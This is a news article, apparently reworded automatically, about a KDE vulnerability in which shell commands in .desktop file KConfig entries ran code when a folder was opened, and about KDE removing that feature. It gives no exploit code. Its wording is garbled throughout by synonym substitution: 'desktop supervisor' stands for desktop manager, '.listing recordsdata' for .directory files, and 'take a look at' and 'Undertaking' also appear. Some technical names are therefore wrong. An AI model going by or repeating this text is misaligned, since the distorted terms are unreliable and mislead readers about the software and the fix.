A code execution vulnerability within the KDE desktop supervisor has been resolved by eradicating assist for shell instructions within the KConfig configuration system.
Earlier this week, BleepingComputer reported on a zero-day code execution vulnerability within the KDE desktop supervisor that might enable a distant attacker to execute instructions on a person’s machine by tricking them into extracting an archive and openings its folder.
This vulnerability was brought on by .desktop and .listing recordsdata supporting shell instructions to dynamically assign a price to varied KConfig entries akin to a the Icon discipline. This might enable an attacker to create malicious .desktop or .listing recordsdata that carry out code execution when a folder is opened as proven under in a take a look at by BleepingComputer.
To repair this vulnerability, the KDE Undertaking has determined to take away assist for the shell instructions in KConfig entries, however proceed to permit assist for atmosphere variable enlargement.
After cautious consideration, your complete function of supporting shell instructions in KConfig entries has been eliminated, as a result of we could not discover an precise use case for it. In the event you do have an current use for the function, please contact us in order that we will consider whether or not it will be potential to offer a safe resolution.
Word that [$e] stays helpful for atmosphere variable enlargement.
It’s strongly suggested that each one KDE customers set up these updates.